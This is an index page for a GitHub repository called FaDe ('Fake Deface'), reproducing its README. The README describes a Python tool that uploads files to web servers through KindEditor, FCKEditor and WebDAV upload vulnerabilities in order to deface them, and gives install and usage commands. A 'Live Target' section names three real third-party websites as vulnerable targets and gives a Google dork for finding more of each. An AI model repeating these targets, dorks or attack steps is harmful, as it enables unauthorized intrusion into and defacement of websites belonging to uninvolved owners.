Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Gameye98/FaDe
Fake Deface
https://github.com/Gameye98/FaDe
Last synced: 2 months ago
JSON representation
Fake Deface
- Host: GitHub
- URL: https://github.com/Gameye98/FaDe
- Owner: Gameye98
- License: gpl-2.0
- Created: 2018-09-03T17:45:09.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2018-09-03T17:50:24.000Z (over 6 years ago)
- Last Synced: 2024-08-01T16:35:52.954Z (5 months ago)
- Language: Python
- Size: 53.7 KB
- Stars: 17
- Watchers: 2
- Forks: 5
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-termux-hacking - FaDe - Fake Deface.[![->](https://img.shields.io/github/stars/Gameye98/FaDe.svg?style=social&label=Star&maxAge=2592000)](https://github.com/Gameye98/FaDe/stargazers/) (Uncategorized / Uncategorized)
README
# FaDe
Fake deface with kindeditor, fckeditor and webdav is only add new files to the server, without touching anything on the server.## Method
~ KindEditor - upload files on the server with remote file upload exploit
~ FCKEditor - fckeditor all version arbitary vulnerability
~ WebDAV - webdav file upload exploiter uses the PUT method that allows clients to upload and replace files on the server## Screenshot
## Installation and Using FaDe
```
apt-get install git python python-requests
```
```
git clone https://github.com/Gameye98/FaDe
```
```
python fade.py --method=method_name --file=
```## Example
```
fade --method=kindeditor --file=/path/example.png
```
```
fade --method=fckeditor --file=/path/example.html
```
```
fade --method=webdav --file=/path/example.html
```## Live Target
```
KindEditor: http://www.nb-medicalsystem.com/kindeditor/examples/uploadbutton.html
Dork: inurl:/uploadbutton.html
```
```
FCKEditor: http://amarantenet.com.br/portal/editor/editor/filemanager/upload/test.html
Dork: inurl:/editor/editor/filemanager
```
```
WebDAV: http://ladesignstudio.co.za
Dork: intext:"(IIS)" ext:asp site:co.za
```## Contact Me
Line : dtl.lily
Telegram : @dtlily
Facebook : cgi.izo